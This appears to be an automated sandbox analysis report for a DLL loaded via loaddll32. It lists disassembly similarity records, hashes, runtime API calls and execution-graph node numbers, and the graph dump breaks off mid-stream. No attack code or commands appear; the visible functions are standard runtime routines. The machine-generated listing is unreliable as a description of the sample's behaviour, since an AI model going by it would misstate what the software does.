                                                                                                      Similarity
                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: Eh@m$csm
                                                                                                      • API String ID: 3480331319-759941577
                                                                                                      • Opcode ID: d157080d203bae239345ee6142ffa09131d83fe60fe0de1d31fbe676242daf6e
                                                                                                      • Instruction ID: 4578d896a4470d93fc161065ffa0d666e75cfef6c29950e9f2f5b96b18523ea7
                                                                                                      • Opcode Fuzzy Hash: d157080d203bae239345ee6142ffa09131d83fe60fe0de1d31fbe676242daf6e
                                                                                                      • Instruction Fuzzy Hash: 7541A234A042499BCF00CF68C881EAEBBB5BF45318F118179E9546B352D731DE56CBE0
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 6D401FCF
                                                                                                        • Part of subcall function 6D409071: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,24448D6D,6D4059FC,?,6D42DDF0,?,?,?,24448D6D), ref: 6D4090D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                      • API String ID: 3109751735-1866435925
                                                                                                      • Opcode ID: c7674c04880867f5e56eb3409b63ae8aa4279b23a473b51dfbbd07b18ba3f0b6
                                                                                                      • Instruction ID: 657985bba8354cb31239a65af9121e9c5c33e5efe617fa7d7a1549a9590bb5a6
                                                                                                      • Opcode Fuzzy Hash: c7674c04880867f5e56eb3409b63ae8aa4279b23a473b51dfbbd07b18ba3f0b6
                                                                                                      • Instruction Fuzzy Hash: 3D11E7B69147056BC700DF68C801F96B3ACAF19314F08853AFA5AD7641E771ED14CBD1
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,6D416009,?,6D42E510,0000000C,6D4160B1,?,?,?), ref: 6D416129
                                                                                                      • GetLastError.KERNEL32(?,6D416009,?,6D42E510,0000000C,6D4160B1,?,?,?), ref: 6D416133
                                                                                                      • __dosmaperr.LIBCMT ref: 6D41615E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                      • String ID: .Wu
                                                                                                      • API String ID: 2583163307-3424199868
                                                                                                      • Opcode ID: 3d09b87febcee8acabd00c3fd9a7b6969fdcc5bbc20ba933dd71bc8f4e116753
                                                                                                      • Instruction ID: 35af0d37948b458148aa0b96349eaa7696c85e7f886279b6b050c69004dcb215
                                                                                                      • Opcode Fuzzy Hash: 3d09b87febcee8acabd00c3fd9a7b6969fdcc5bbc20ba933dd71bc8f4e116753
                                                                                                      • Instruction Fuzzy Hash: 9E01263BA0C16116C61597399C84F7E2B6AAB83738F36062DEA14C76C2DF61CC8181D0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: 11cc333336918b2aceaa9b877d76c2bed9ff9120129b65150a3e582bec28987f
                                                                                                      • Instruction ID: 9bda0eadc5e696ad1c63e2920e0f587492a8dc590e90ad5dfc2d49a1e7be5365
                                                                                                      • Opcode Fuzzy Hash: 11cc333336918b2aceaa9b877d76c2bed9ff9120129b65150a3e582bec28987f
                                                                                                      • Instruction Fuzzy Hash: 14B1FF7190829A9FDB22CF58CCD2BBEBBA5FB47314F254169D544EB341DA348D42CBA0
                                                                                                      APIs
                                                                                                      • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,?,6D41E5A8,?,00000001,?,00000001,?,6D4164B3,00000020,00000000,00000001), ref: 6D41FBF9
                                                                                                      • GetLastError.KERNEL32(?,6D41E5A8,?,00000001,?,00000001,?,6D4164B3,00000020,00000000,00000001,00000020,00000001,?,6D416A32,00000008), ref: 6D41FC05
                                                                                                        • Part of subcall function 6D41FBCB: CloseHandle.KERNEL32(FFFFFFFE,6D41FC15,?,6D41E5A8,?,00000001,?,00000001,?,6D4164B3,00000020,00000000,00000001,00000020,00000001), ref: 6D41FBDB
                                                                                                      • ___initconout.LIBCMT ref: 6D41FC15
                                                                                                        • Part of subcall function 6D41FB8D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D41FBBC,6D41E58E,00000001,?,6D4164B3,00000020,00000000,00000001,00000020), ref: 6D41FBA0
                                                                                                      • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,6D41E5A8,?,00000001,?,00000001,?,6D4164B3,00000020,00000000,00000001,00000020), ref: 6D41FC2A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744216297-0
                                                                                                      • Opcode ID: 2ec8c4fdafab03f85edf75f7a50a3d75e668bad95a6bfe3e45ce16307cdc1c12
                                                                                                      • Instruction ID: 47d831078b68c11ff93a9b6f00ec5a7cc1530cd8c050bebd293bf244a4333374
                                                                                                      • Opcode Fuzzy Hash: 2ec8c4fdafab03f85edf75f7a50a3d75e668bad95a6bfe3e45ce16307cdc1c12
                                                                                                      • Instruction Fuzzy Hash: 2FF01C37446219BBCF222F91CC04EAA3F76FB0A7A1F154014FA1886120D732CC21EB90
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 6D410D7E
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D410D91
                                                                                                      • _free.LIBCMT ref: 6D410DA2
                                                                                                      • _free.LIBCMT ref: 6D410DB3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: ca58fe2bc87622956b0631a2c213b5686ca3d1d22323760f067fd1de443d22e1
                                                                                                      • Instruction ID: 78a0b45f693bad18928316d50ca41af4ff03703e623af40803d506098eef852c
                                                                                                      • Opcode Fuzzy Hash: ca58fe2bc87622956b0631a2c213b5686ca3d1d22323760f067fd1de443d22e1
                                                                                                      • Instruction Fuzzy Hash: 28E0467882E2209B8F6ABF2F9801F593BB9B726B04743434AE06012250CB318C22DFC0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcspn
                                                                                                      • String ID: <,@m
                                                                                                      • API String ID: 3709121408-1771337057
                                                                                                      • Opcode ID: 8d2d622041a6741c9a46e639c17066a607ee518ad89f32de36ed798e96818cc7
                                                                                                      • Instruction ID: 2e14146853885407bba907ca35a520a758e83f733ec4b53e15365b2d46c1dd89
                                                                                                      • Opcode Fuzzy Hash: 8d2d622041a6741c9a46e639c17066a607ee518ad89f32de36ed798e96818cc7
                                                                                                      • Instruction Fuzzy Hash: 74E17D75A002499FDB04CFA8C894FEEBBB9FF49304F208169E915AB351D731AD45CBA1
                                                                                                      APIs
                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 6D40F82D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorHandling__start
                                                                                                      • String ID: pow
                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                      • Opcode ID: 602110d9c61fa53b5ea4bf9088ded058858855006909f2e323eeb789741ad1ea
                                                                                                      • Instruction ID: bcee5ab13a32418d5ee75da45809b256b3b768808ba37bad763d8858423e5ce8
                                                                                                      • Opcode Fuzzy Hash: 602110d9c61fa53b5ea4bf9088ded058858855006909f2e323eeb789741ad1ea
                                                                                                      • Instruction Fuzzy Hash: 47513971A5E10396DB01BB14CD40FB97BB4AB81B41F308D79E4F546398EB36CCC58A8A
                                                                                                      APIs
                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,6D41FFAF), ref: 6D41EC1B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DecodePointer
                                                                                                      • String ID: Eh@m$\KBm
                                                                                                      • API String ID: 3527080286-3111840648
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 6D401FCF
                                                                                                        • Part of subcall function 6D409071: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,24448D6D,6D4059FC,?,6D42DDF0,?,?,?,24448D6D), ref: 6D4090D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                      • API String ID: 3109751735-1240500531
                                                                                                      APIs
                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6D40B0DE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EncodePointer
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                      APIs
                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6D41D621,00000000,00000050,?,?,?,?,?), ref: 6D41D4A1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 0-711371036
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D401A5B
                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D401AAA
                                                                                                        • Part of subcall function 6D405CCE: _Yarn.LIBCPMT ref: 6D405CED
                                                                                                        • Part of subcall function 6D405CCE: _Yarn.LIBCPMT ref: 6D405D11
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D405C6A
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D405CC5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID: Eh@m
                                                                                                      • API String ID: 593203224-137412459
                                                                                                      APIs
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,6D413E9F,?,?,00000004), ref: 6D414FE5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                                      • String ID: Eh@m$InitializeCriticalSectionEx
                                                                                                      • API String ID: 2593887523-746424252
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free
                                                                                                      • String ID: Eh@m$FlsFree
                                                                                                      • API String ID: 3978063606-1567611034
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Alloc
                                                                                                      • String ID: Eh@m$FlsAlloc
                                                                                                      • API String ID: 2773662609-3790005588

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.2%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:3.6%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:72
50059->50083 50060 e4a4d2 50061 e40ee4 50060->50061 50108 e49e50 78 API calls 50060->50108 50063 e457c0 50061->50063 50064 e45805 50063->50064 50065 e49d90 78 API calls 50064->50065 50067 e45820 50064->50067 50065->50067 50066 e322e0 78 API calls 50071 e45939 50066->50071 50069 e45876 50067->50069 50200 e4b3e0 79 API calls 4 library calls 50067->50200 50069->50066 50070 e40eeb 50073 e4aa90 50070->50073 50071->50070 50201 e49e50 78 API calls 50071->50201 50074 e4aacd 50073->50074 50202 e4a080 50074->50202 50079 e49d90 78 API calls 50080 e4ab1e 50079->50080 50080->49606 50081->50050 50082->50052 50084 e32302 50083->50084 50085 e322fa 50083->50085 50084->50060 50087 e32312 50085->50087 50109 e8f18a 50085->50109 50112 e32200 78 API calls 4 library calls 50087->50112 50089 e32348 50090 e8f18a Concurrency::cancel_current_task RaiseException 50089->50090 50091 e32357 50090->50091 50113 e8ee1e 27 API calls 2 library calls 50091->50113 50093 e32384 50093->50060 50095 e49e19 50094->50095 50096 e49dc9 50094->50096 50097 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50095->50097 50114 e476f0 78 API calls 50096->50114 50099 e49e4b 50097->50099 50099->50058 50100 e49dd2 50101 e49e01 50100->50101 50102 e322e0 78 API calls 50100->50102 50101->50095 50115 e49e50 78 API calls 50101->50115 50102->50101 50116 e45270 50104->50116 50120 e42530 50104->50120 50105 e480b6 50105->50059 50108->50061 50110 e8f1d1 RaiseException 50109->50110 50111 e8f1a4 50109->50111 50110->50087 50111->50110 50112->50089 50113->50093 50114->50100 50115->50095 50117 e4532c 50116->50117 50118 e4529a _Yarn 50116->50118 50117->50105 50118->50117 50125 e44f60 50118->50125 50122 e4254a _Yarn 50120->50122 50124 e42616 _Yarn 50120->50124 50121 e426b0 50121->50105 50122->50105 50124->50121 50145 e9c95f 50124->50145 50126 e44f75 50125->50126 50127 e4510f 50125->50127 50128 e44f7b 50126->50128 50129 e44fd3 50126->50129 50130 e44fe8 50126->50130 50127->50118 
50128->50118 50131 e8d73a std::_Facet_Register 28 API calls 50129->50131 50132 e4500f 50130->50132 50133 e44fff 50130->50133 50134 e4500d 50130->50134 50140 e44fe1 _Yarn 50131->50140 50136 e8d73a std::_Facet_Register 28 API calls 50132->50136 50132->50140 50133->50134 50135 e4511b 50133->50135 50134->50127 50137 e8d73a std::_Facet_Register 28 API calls 50134->50137 50143 e317d0 28 API calls 2 library calls 50135->50143 50136->50140 50137->50140 50142 e450dd error_info_injector 50140->50142 50144 e9c3be 26 API calls 2 library calls 50140->50144 50142->50118 50143->50140 50146 e9c98a 50145->50146 50147 e9c96d 50145->50147 50146->50121 50147->50146 50148 e9c97a 50147->50148 50149 e9c990 50147->50149 50162 e9ca3d 20 API calls _free 50148->50162 50154 e9c74e 50149->50154 50152 e9c97f 50163 e9c3ae 26 API calls __cftof 50152->50163 50155 e9c75a __FrameHandler3::FrameUnwindToState 50154->50155 50164 e98911 EnterCriticalSection 50155->50164 50157 e9c768 50165 e9c79f 50157->50165 50161 e9c786 __wsopen_s 50161->50146 50162->50152 50163->50146 50164->50157 50175 ea6db5 50165->50175 50172 e9c793 50199 e98925 LeaveCriticalSection 50172->50199 50174 e9c79d 50174->50161 50176 ea3c8d __fread_nolock 26 API calls 50175->50176 50177 ea6dc4 50176->50177 50178 eae7a2 __fread_nolock 26 API calls 50177->50178 50179 ea6dca _MREFOpen@16 50178->50179 50180 e9c7b3 50179->50180 50181 ea6049 __fread_nolock 21 API calls 50179->50181 50184 e9c7e4 50180->50184 50182 ea6e29 50181->50182 50183 ea4646 _free 20 API calls 50182->50183 50183->50180 50185 e9c7ce 50184->50185 50188 e9c7f6 50184->50188 50195 ea6e6a 50185->50195 50186 e9c804 50187 e9ca3d _free 20 API calls 50186->50187 50189 e9c809 50187->50189 50188->50185 50188->50186 50192 e9c82e _Yarn _MREFOpen@16 50188->50192 50190 e9c3ae __cftof 26 API calls 50189->50190 50190->50185 50191 e98b56 ___scrt_uninitialize_crt 71 API calls 50191->50192 50192->50185 50192->50191 50193 ea3c8d __fread_nolock 26 API calls 50192->50193 50194 ea58de __wsopen_s 71 
API calls 50192->50194 50193->50192 50194->50192 50196 e9c775 50195->50196 50197 ea6e75 50195->50197 50196->50172 50197->50196 50198 e98b56 ___scrt_uninitialize_crt 71 API calls 50197->50198 50198->50196 50199->50174 50200->50069 50201->50070 50231 e8bf0d 50202->50231 50205 e8bf0d std::_Lockit::_Lockit 7 API calls 50206 e4a0f0 50205->50206 50209 e8bf65 std::_Lockit::~_Lockit 2 API calls 50206->50209 50207 e4a110 50211 e4a155 50207->50211 50213 e8d73a std::_Facet_Register 28 API calls 50207->50213 50209->50207 50210 e4a1dd 50212 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50210->50212 50237 e8bf65 50211->50237 50214 e4a1f6 50212->50214 50215 e4a160 50213->50215 50223 e45610 50214->50223 50244 e31e80 78 API calls 2 library calls 50215->50244 50217 e4a190 50245 e8cae3 46 API calls __Getctype 50217->50245 50219 e4a1a6 50246 e31f30 76 API calls 3 library calls 50219->50246 50221 e4a1b8 50247 e8c33d 28 API calls std::_Facet_Register 50221->50247 50224 e45657 50223->50224 50225 e45672 50224->50225 50226 e49d90 78 API calls 50224->50226 50227 e322e0 78 API calls 50225->50227 50226->50225 50229 e4576e 50227->50229 50228 e45785 50228->50079 50229->50228 50252 e49e50 78 API calls 50229->50252 50232 e8bf1c 50231->50232 50233 e8bf23 50231->50233 50248 e9f30a 6 API calls std::_Lockit::_Lockit 50232->50248 50235 e4a0ce 50233->50235 50249 e8d1b3 EnterCriticalSection 50233->50249 50235->50205 50235->50207 50238 e9f318 50237->50238 50240 e8bf6f 50237->50240 50251 e9f2f3 LeaveCriticalSection 50238->50251 50243 e8bf82 50240->50243 50250 e8d1c1 LeaveCriticalSection 50240->50250 50242 e9f31f 50242->50210 50243->50210 50244->50217 50245->50219 50246->50221 50247->50211 50248->50235 50249->50235 50250->50243 50251->50242 50252->50228 50254 e9cc5c 50253->50254 50256 e9cc70 50253->50256 50261 e9ca3d 20 API calls _free 50254->50261 50260 e9cc6c __alldvrm 50256->50260 50263 ea4d36 11 API calls 2 library calls 50256->50263 50257 
